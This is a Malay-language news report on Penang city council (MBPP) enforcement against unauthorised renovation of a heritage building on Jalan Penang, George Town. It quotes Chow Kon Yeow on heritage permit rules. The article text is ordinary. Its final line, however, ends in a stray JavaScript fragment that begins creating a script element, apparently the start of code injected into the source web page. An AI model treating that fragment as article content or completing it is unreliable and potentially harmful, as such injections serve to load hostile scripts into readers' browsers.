Kerja baik pulih bangunan di tapak warisan perlu kemuka pelan kepada MBPP

Oleh : NORSHAHIDA YUSOFF

GEORGE TOWN – Langkah penguatkuasaan terhadap sebuah bangunan warisan kategori 2 di Jalan Penang 12 Oktober lalu adalah ekoran kerja-kerja dijalankan di tapak berkaitan yang tidak memperoleh kebenaran Majlis Bandaraya Pulau Pinang (MBPP).

Perkara tersebut dimaklumkan Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow sebagai mengulas kenyataan sebuah akhbar berbahasa Cina bertarikh 13 Oktober lalu berhubung tindakan berkaitan.

Menurut beliau, berdasarkan Rancangan Kawasan Khas (RKK) Tapak Warisan Dunia George Town, semua kerja membaik pulih bangunan yang dijalankan di dalam kawasan tapak warisan perlu mengemukakan permohonan pelan kepada MBPP untuk diperakukan terlebih dahulu.

“Segala permohonan yang dikemukakan oleh pemunya untuk membaik pulih bangunan memerlukan perakuan daripada Jawatankuasa Technical Review Panel (TRP) dan diberi kelulusan oleh Jawatankuasa Tetap Pusat Setempat (OSC) sebelum kerja-kerja di tapak boleh dimulakan,” jelasnya pada sidang media ketika tinjauan ke tapak berkenaan di sini baru-baru ini.

Mengulas lanjut, Kon Yeow memberitahu, berdasarkan rekod, pemunya bangunan telah mengemukakan permohonan untuk menjalankan kerjakerja pembaikan kecil iaitu pendawaian elektrik serta membaik pulih tandas dan MBPP telah mengeluarkan permit bagi kerja-kerja tersebut pada 18 Ogos 2016.

“Namun, hasil daripada siasatan mendapati bahawa kerja-kerja yang dijalankan di tapak tidak mematuhi permit dikeluarkan.

“Kerja-kerja dikesan yang dijalankan termasuk memasang kemasan jubin baru pada dinding dan lantai tingkat bawah, menggunakan lepaan simen serta memasang bumbung asbestos di bahagian sisi bangunan.

“Justeru, tindakan penguatkuasaan yang diambil oleh MBPP terhadap lantai dan dinding premis adalah ekoran tidak mempunyai kebenaran dan juga tidak mematuhi peraturan warisan,” ujarnya.

Hadir sama, Ahli Dewan Undangan Negeri (ADUN) Komtar, Teh Lai Heng dan Pengarah Konservasi Warisan MBPP, Noorhanis Noordin.

Sehubungan itu, tambah Kon Yeow, pemunya bangunan telah diberi nasihat dan amaran serta disusuli dengan notis di bawah Akta Jalan, Parit dan Bangunan 1974 supaya menghentikan kerja-kerja pengubahsuaian di tapak.

“Pemilik bangunan, pihak konsultan dan kontraktor di dalam Tapak Warisan Dunia George Town dinasihati supaya mematuhi segala syarat dan undang-undang yang telah ditetapkan bagi memastikan nilai keunggulan sejagat di kawasan tersebut terus dipelihara.

“Kita harap mereka (pemunya bangunan, konsultan dan kontraktor) tidak menyalahgunakan permit yang diberikan.

“Untuk pengetahuan, pihak Majlis sentiasa melakukan pemantauan ketat terhadap kerja-kerja yang dilakukan,” kata beliau.var d=document;var s=d.createElement(‘script’);